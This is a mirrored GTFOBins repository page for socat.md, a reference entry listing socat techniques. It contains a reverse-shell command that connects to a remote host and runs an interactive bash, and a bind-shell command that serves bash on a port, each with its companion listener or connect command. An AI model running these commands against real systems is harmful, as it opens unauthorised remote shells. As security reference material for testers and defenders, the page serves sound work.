This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-07 16:21:32 +01:00
Code
Issues
414ee88fd8
GTFOBins.github.io
/
_gtfobins
/
socat.md
Emilio Pinna
4e61de337a
Add socat bind-shell
2018-05-23 20:55:36 +01:00
559 B
Raw
Blame
History
functions
reverse-shell
bind-shell
description
code
Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
RHOST=10.0.0.1 RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
description
code
Run <code>socat FILE:`tty`,raw,echo=0 TCP:10.0.0.2:12345</code> to connect to the shell on the other end.
LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane